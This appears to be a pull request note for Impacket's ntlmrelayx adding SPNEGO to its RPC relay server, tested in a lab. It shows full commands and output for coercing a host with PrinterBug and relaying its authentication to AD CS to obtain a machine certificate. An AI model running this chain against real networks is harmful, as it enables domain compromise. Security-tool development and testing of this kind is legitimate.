rpcrelayserver: support for SPNEGO

[Romern]

This pull request implements SPNEGO for the rpcrelayserver in ntlmrelayx.

Can be tested with printerbug for example by specifying a hostname of a computer account (else just straight NTLM is used):

$ nxc smb -u Administrator -p 'password!1' -d romern.lab -M coerce_plus --smb-timeout 20 -o METHOD=printerbug LISTENER=testcomputer -- 192.168.128.101
SMB         192.168.128.101 445    WIN11VM          [*] Windows 11 / Server 2025 Build 26100 x64 (name:WIN11VM) (domain:romern.lab) (signing:False) (SMBv1:None)
SMB         192.168.128.101 445    WIN11VM          [+] romern.lab\Administrator:password!1 (Pwn3d!)
COERCE_PLUS 192.168.128.101 445    WIN11VM          VULNERABLE, PrinterBug

$ ntlmrelayx.py -t http://192.168.128.100/certsrv/certfnsh.asp --adcs -smb2support --keep-relaying -debug --template 'Machine'
Impacket v0.14.0.dev0+20260205.104528.a023ef32 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /Users/roman/repos/impacket/impacket
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client DCSYNC loaded..
[+] Protocol Attack WINRMS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Setting up MSSQL Server on port 1433
[*] Setting up RDP Server on port 3389
[*] Multirelay disabled

[*] Servers started, waiting for connections
[+] Callback added for UUID 99FCFEC4-5260-101B-BBCB-00AA0021347A V:0.0
[+] Callback added for UUID E1AF8308-5D1F-11C9-91A4-08002B14A0FA V:3.0
[+] (RPC): Received packet of type MSRPC BIND
[+] (RPC): Answering to a BIND without authentication
[+] (RPC): Received packet of type MSRPC REQUEST
[+] (RPC): Sending packet of type MSRPC RESPONSE
[+] Callback added for UUID 99FCFEC4-5260-101B-BBCB-00AA0021347A V:0.0
[+] Callback added for UUID E1AF8308-5D1F-11C9-91A4-08002B14A0FA V:3.0
[+] (RPC): Received packet of type MSRPC BIND
[+] (RPC): Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[+] (RPC): Sending packet of type MSRPC BINDACK
[+] (RPC): Received packet of type MSRPC ALTERCTX
[*] (RPC): Received connection from 192.168.128.101, attacking target http://192.168.128.100
[+] (RPC): Sending packet of type MSRPC ALTERCTX R
[+] (RPC): Received packet of type MSRPC ALTERCTX
[*] HTTP server returned error code 200, treating as a successful login
[*] (RPC): Authenticating connection from ROMERN/WIN11VM$@192.168.128.101 against http://192.168.128.100 SUCCEED [1]
[+] (RPC): Sending packet of type MSRPC FAULT
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> Generating CSR...
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> CSR generated!
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> Getting certificate...
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> GOT CERTIFICATE! ID 7
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> Writing PKCS#12 certificate to ./WIN11VM.pfx
[*] http://ROMERN/WIN11VM$@192.168.128.100 [1] -> Certificate successfully written to file